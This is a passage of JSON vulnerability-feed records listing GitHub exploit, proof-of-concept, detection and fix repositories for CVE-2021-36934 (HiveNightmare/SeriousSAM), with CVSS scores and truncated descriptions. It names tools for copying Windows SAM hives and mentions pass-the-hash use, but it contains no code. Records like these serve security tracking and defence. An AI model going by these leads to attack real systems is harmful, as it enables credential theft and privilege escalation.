"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:01:21", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-05-01T09:47:57", "id": "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": "CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:54:50", "description": "# CVE-2021-36934\n\nC# implementation of [C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-24T12:55:05", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-08-13T21:20:25", "id": "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:41", "description": "<p><strong>Windows Elevation of Privilege Vulnerability CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-04T10:37:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T10:47:55", "id": "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:06:02", "description": "# CVE-2021-36934\nSeriousSAM Auto Exploiter\n\n# Requirements\n- Hiv...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-01T19:54:31", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-04-20T08:36:49", "id": "73C3C634-4118-5E8F-A7A7-ADE9356507EC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:16", "description": "# CVE-2021-36934\nCVE-2021-36934 HiveNightmare vulnerability chec...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-29T20:35:22", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-30T12:29:18", "id": "E1AF9415-BECF-5F8A-9233-786A0F50E149", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:28", "description": "# CVE-2021-36934\n![Screenshot](https://github...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T08:01:08", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T08:18:37", "id": "BF498AAC-B85E-5E3F-87EC-BC028A10A6D6", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:58", "description": "# Overview #\n\nThis is a Datto RMM component to mitigate CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T18:00:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-25T18:10:18", "id": "27F005C9-EA16-5734-81D4-8D66FA582FF9", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:25", "description": "[CVE described on MSRC](https://msrc.microsoft.com/update-guide/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T14:53:09", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-06T14:49:37", "id": "6B43F1C6-9617-5317-90DA-3EB5A74767E2", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:50", "description": "# PyNightmare\nPoC for CVE-2021-36934 Aka HiveNightmare/SeriousSA...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T00:31:11", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-12-31T15:22:31", "id": "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:10", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell scripts\n\n* Detection....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T21:54:45", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-28T01:48:39", "id": "27CF7C36-9804-5585-80B1-749949BF7AD5", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:51", "description": "# VSSCopy\nSmall and dirty PoC f...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:55:23", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T14:35:30", "id": "6F87E072-E5AF-533F-8FC7-725ACB3BD31F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:42:04", "description": "# Invoke-HiveNightmare\nPowerShell-based PoC for CVE-2021-36934, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T03:07:56", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-15T12:11:50", "id": "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:10:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-01-22T01:53:54", "id": "943CFE24-FF5E-5BEA-B1DF-3163AED2C847", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:49:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-30T06:53:48", "id": "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:57", "description": "\ufffd\ufffd#\u0000 \u0000C\u0000V\u0000E\u0000-\u00002\u00000\u00002\u00001\u0000-\u00003\u00006\u00009\u00003\u00004\u0000\r\u0000\n\u0000\r\u0000\n\u0000#\u0000#\u0000 \u0000U\u0000s\u0000a\u0000g\u0000e\u0000\r\u0000\n\u0000\r\u0000...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T17:24:44", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-25T06:37:22", "id": "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:42:24", "description": "# ShadowSteal | CVE-2021-36934\nPure Nim implementation for explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T22:16:49", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-27T07:12:59", "id": "82FD6A90-EA27-5350-98A4-491B6CA140ED", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cnvd": [{"lastseen": "2022-11-05T11:04:41", "description": "Microsoft Windows is an operating system for personal devices from Microsoft Corporation (USA). Microsoft Windows is vulnerable to an access control error, which stems from an elevation of privilege vulnerability because the system has an overly loose access control list for multiple system files. An attacker could exploit this vulnerability to run arbitrary code using SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-23T00:00:00", "type": "cnvd", "title": "Microsoft Windows Access Control Error Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 